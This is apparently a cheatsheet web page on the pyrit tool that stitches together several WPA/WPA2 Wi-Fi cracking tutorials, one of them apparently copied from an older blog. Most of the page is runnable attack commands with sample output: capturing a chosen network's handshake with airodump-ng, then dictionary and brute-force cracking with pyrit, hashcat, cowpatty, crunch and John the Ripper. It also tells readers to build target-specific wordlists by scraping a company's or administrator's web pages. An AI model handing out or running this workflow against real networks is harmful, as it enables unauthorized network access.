🖥️pyrit
➡️This is a command-line reference manual for commands and command combinations that you don’t use often enough to remember it. This cheatsheet explains the pyrit command with important options and switches using examples.
11 minute read
▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁
# ██████╗ ██╗ ██╗██████╗ ██╗████████╗
# ██╔══██╗╚██╗ ██╔╝██╔══██╗██║╚══██╔══╝
# ██████╔╝ ╚████╔╝ ██████╔╝██║ ██║
# ██╔═══╝ ╚██╔╝ ██╔══██╗██║ ██║
# ██║ ██║ ██║ ██║██║ ██║
# ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝
http://console-cowboys.blogspot.com/2011/01/more-wpa-cracking-techniques-jtr-pyrit.html
https://br-new.com/online/%E2%96%BA-kali-linux-cowpatty-genpmk-pyrit-vs-aircrack-ng-tutorial-deutsch-hd-YQ0jcgLbHqg.html
pyrit eval
pyrit -i <dictionary.txt> import_passwords
pyrit -e <ssid> create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o <wpadb> export_hashdb
aircrack-ng -r <wpadb> <output01>.cap
Some useful resources
http://www.backtrack-linux.org/tutorials/usb-live-install/
http://www.backtrack-linux.org/downloads/
http://www.aircrack-ng.org/doku.php?id=airolib-ng
http://j2neon.blogspot.com/2011/07/cracking-wpa-using-pyrit-and-aircrack.html
https://xiaopan.co/forums/threads/crack-wpa2-know-your-target.2030/
http://adaywithtape.blogspot.com/2011/05/creating-wordlists-with-crunch-v30.html
./crunch 10 10 0123456789 -s 0125700000 -e 0125800000 -u | ./cowpatty -2 -f- -r <cap.file> -s <ESSID> -v
pyrit -r "yourcapture*.pcap" analyze give you what status (good/workable/bad)?
pyrit -r handshake_NETGEAR83_2C-30-33-D5-7F-E4_2018-07-14T22-47-58.cap analyze
airmon-ng start wlan0
Now the monitor mode is enabled with name wlan0mon.
and then with the following command start listening to all the available wifi connections:
airodump-ng wlan0mon
After running the above command it will start listening all the wifi traffic nearby so wait till your target appears and then hit ctrl^c.
Now we have to listen to a specific channel on which the target is present . Now run command:
airodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == channel number of the target (2 in my case , see the CH column)
–bssid == MAC address of the target AP
–write == name of the capture file
Now wait till the WPA handshake is captured and then hit crtl^c.
Now a file named sommay-01.cap will be generated
PYRIT
First method to crack the password from the capture file is PYRIT . We will use dictionary-attack so run command:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i == path to the input file in our case it is the path to dictionary
-r == path to the captured fle which ( in our case it is sommay-01.cap)
attack_passthrough == this options is to specify that a dictionary attack is to be performed
As you can see it has successfully cracked the password.
OCLHASHCAT
First of all download oclhashcat from its official website: https://hashcat.net/files/hashcat-2.00.7z
First we have to convert the .cap file we captured with airodump-ng previously to .hccap with aircrack-ng by command:
aircrack-ng sommay-01.cap -J sommay-01
-J == the path to the output file with extension .hccap
Now copy the dictionary you want to use in the Hashcat folder. Now enter in the hashcat folder and run command:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
In above command if you are using 32 bit system replace 64 with 32.
-m is the hash type which is 2500 for WPA/WPA2 cracking
then give the path to .hccap file which you converted with aircrack-ng. and then the name of the dictionary file. As you can see it has successfully cracked the password.
COWPATTY
For cracking with the help of cowpatty we have to first generate the hash file specific to the target AP. For this we will use genpmk so run command:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f == path to the dictionary file
-d == name of the output dictionary
-s == ESSID(Name) of the target AP(The name should be identical to the target AP)
Now it will generate a dictionary file named cowpatty_dict which will speed up the cracking process.
Now run command :
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d == path to dictionary we generated with genpmk
-r == path to the capture file we generated with airodump-ng
-s == ESSID of the target AP(The name should be identical to the target AP)
#########################
WPA JTR/Pyrit/cowpatty uses and cracking interoperability
Below is a bunch of ways to inter-operate between pyrit/cowpatty/jtr with various attacking and exporting techniques. I recently figured these out while having to juggle all kinds of cracking issues. A few weeks ago I was performing a wireless pentest and came up across a rather standard WPA PSK network. However, this came with issues that spawned into learning a bunch of new command line usages for various tools in conjunction with one another.
For the end goal of a simple WPA key retrieval. The issue I was having which required me to expand my wireless toolset was that programs across various operating systems were behaving differently or just plain not working at all. For example my cracker of choice is generally CowPatty but for some reason and I hope one of the readers on this blog can tell me why, CowPatty was behaving differently between my OSX, Standard Linux distro and my BT4 R2 Vmware. This is also the reason for the last post on GPU CUDA via OSX. So below are various ways to use different programs for WPA cracking related gymnastics of sorts.
Standard Cracking:
Firstly we have our standard way of cracking WPA, we can use CowPatty to determine if we have a handshake and then crack the password.
Check if we have a handshake with –c option:
cowpatty -r Capture.cap -c -s SSID
cowpatty 4.6 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against WPA/PSK passphrase
Try to Crack the password:
Now if we are sure we have a valid handshake we can crack the hash with a dictionary file. Using the following cmdline.
cowpatty -r Capture.cap -f dictionary.txt -s SSID
Starting dictionary attack. Please be patient.
key no. 1000: Anglo-spanish
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID. Sorry it did not work out.
1786 passphrases tested in 8.04 seconds: 222.04 passphrases/second
My problem was that CowPatty in anything other then my BT4 r2 vmware was not properly finding the handshake.
cowpatty -r Capture.cap -c -s SSID
End of pcap capture file, incomplete four-way handshake exchange. Try using a
different capture.
Hmm CowPatty is misbehaving on my regular machine, which is where I would want to pre-compute hashes and perform my cracking due to more memory and cores available on my primary system. I do not want to crack any passwords inside of a vmware unless its precomputed and I certainly do not want to try to compute hashes on a vmare either. So I decided to check another popular WPA cracking tool Pyrit against the password hash file.
Using Pyrit for cracking instead:
pyrit -r Capture.cap -i dictionary.txt attack_passthrough
This command was also failing on every single system for unknown reasons at the time. So I decided I was going to have to use Pyrit to Precompute hashes and then use those precomputed hashes inside of a vmware on cowpatty. Interestingly enough you can export pyrit hashtables in various formats to be used with airolib and cowpatty.
Pyrit Usage for Hashtables and cracking:
Pyrit is extremely useful for a few reasons, most importantly being that you can resume functionality such as creating hashtables if for some reason you have to stop an operation and unplug or shutdown your machine. You can simply quit pyrit like any other program, but pyrit will remember where it left off in its hashtable computing. No need to leave your machine in one place running for hours or days. Simply quit and resume at will.
Create a database of SSID’s for attack:
Pyrit –e essid create_essid
Add dictionary words to be hashed:
Pyrit –i dictionaryFile import_passwords
These 2 commands will create a dictionary of SSID and password values used in a standard attack or for precompution of hashtables. Another nice feature of pyrit is that you can keep running the dictionary command to add in as many dictionary files as you have available. Pyrit will remove duplicate entries and will also remove passwords that cannot be used in a WPA protected network such as passwords below 8 characters. This is fantastic, as you won’t waste processor cycles on passwords that are useless.
Create hashtables:
Pyrit batch
The previous command will create hashtables of everything in the database for the given SSID values in the database. At any point during this operation you can quit and resume simply by killing the operation and typing in the previous command again, pyrit will pick up where it left off. Once this is completed you can directly use Pyrit to attack a handshake or in my case pyrit was not recognizing the capture file so I had to export the database in cowpatty format with the following command.
Using pyrit to crack:
Pyrit –r capture.cap attack_db
Exporting different hashtable formats:
As I stated pyrit cracking didn’t work for me due to complications on the way pyrit parsed the capture file, the pyrit command would fail every time and not recognize the handshake. So I exported the hashtable database for use with cowpatty.
Cowpatty export:
Pyrit –e essid -o hashes.cow export_cowpatty
Note that you can also export to airolib format if you prefer using the aircrack suite of tools to do your pre-computed cracking just switch out the export_cowpatty command for the airolib command. Until I got pyrit working correctly I preferred to use cowpatty so I exported to my preferred format.
CowPatty File Size Issue:
Apparently when using 32 bit systems and hash file sizes over 2 gigs cowpatty will not work. So when I tried to directly attack the WPA PSK with the hashfile I was given an error “Could not stat hashfile. Check file path”.
cowpatty -r Capture.cap -d hashes.cow –s SSID
cowpatty 4.6 - WPA-PSK dictionary attack.
cowpatty: Could not stat hashfile. Check file path.
File Size WorkAround:
One way around this annoying issue was to pipe your hashfile into the STDIN value of CowPatty by outputting the hashfile with the unix “cat” command. You can do this by specifying the dash character as the input dictionary file in CowPatty. I found this to be very useful for a few reasons I will show next.
CowPatty with STDIN:
Cat hashes.cow | cowpatty –d - -r capture.cap -s SSID
Using the previous command you can bypass the filesize restriction and use precomputed hashfiles of larger sizes J But the STDIN can also be used for other cracking methods such as running custom bruteforcing of password files with JTR. By taking a dictionary and running it through the rules option of JTR additional characters such as numbers will be added to each word in your dictionary file. Although this may not be feasible do to the slow nature of password cracking without precomputed hashes, it is an option if dictionary files are not finding the password for you.
JTR STDOUT with CowPatty STDIN:
In the john directory type:
./john --wordlist=wordlist --stdout –rules |cowpatty –f - -r capture.cap -s SSID
Custom password list creation:
Another option would be to create a custom password list out of your current password list using JTR rules and then batch them with pyrit shown earlier in this blog post. You can create a custom password list by just using STDOUT to a new password file.
In the john directory type:
./john --wordlist=dictionary.txt --stdout --rules > newpasslist.txt
Then add these new passwords to your pyrit dictionary and re-batch the new passwords with the same commands show previously. This may help in situations where users choose passwords such as password4. Which isn’t a dictionary word but is certainly an easy password to guess.
Custom passwords via webpages:
You could also create yourself custom passwords lists via scraping the companies website or the system administrators personal webpage’s. Its not to hard to find out who the administrator is, make a few phone calls or check the companies webpage for listings of employees. Once a page is found you can scrape the page for password with a tool by the name of CEWL. Although I don’t condone the use of Ruby you may catch a weird disease or feel really dirty after using it yuuuk ruby, this is a useful tool for creating a custom password list.
./cewl.rb -d 1 -w passwordList.txt website.com
Cewl will create a custom password list named “passwordList.txt” which you can then run through john to add more passwords with numbers before batching the new passwords with pyrit. Pyrit will get rid of the useless passwords for you during password import.
The pyrit cracking issue:
I belive the cracking and parsing issue in pyrit was due to the version of pyrit that I was using. For me the only version of pyrit that functions correctly is the SVN version of pyrit currently available on the pyrit site. Any other version failed to work correctly for both parsing and for GPU cracking... See the previous post on this blog for getting your OSX machine to work with GPU and Pyrit. What this will do for you is allow you to efficiently crack passwords in pyrit with much quicker speeds even when passwords are not precomputed.
############################
#==============================##==============================#
# CMD PYRIT #
#==============================##==============================#
Cheatsheets are an excellent complement to other information sources like Linux man-pages, Linux help, or How-To’s and tutorials, as they provide compact and easily accessible information. While man-pages and detailed tutorials often contain comprehensive explanations and extensive guides, cheatsheets summarize the most important options forthe command pyrit in a clear format. This allows users to quickly access the needed information for pyrit without having to sift through lengthy texts. Especially in stressful situations or for recurring tasks, cheatsheets for pyrit are a valuable resource to work efficiently and purposefully.
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
█║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌
██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗███████╗██████╗
████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
╚██╔═██╔╝██║ ██║██║ ██║ ╚███╔╝ █████╗ ██║ ██║
████████╗██║ ██║██║ ██║ ██╔██╗ ██╔══╝ ██║ ██║
╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
█║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
Feedback
Was this page helpful?
Glad to hear it! Please tell us how we can improve.
Sorry to hear that. Please tell us how we can improve.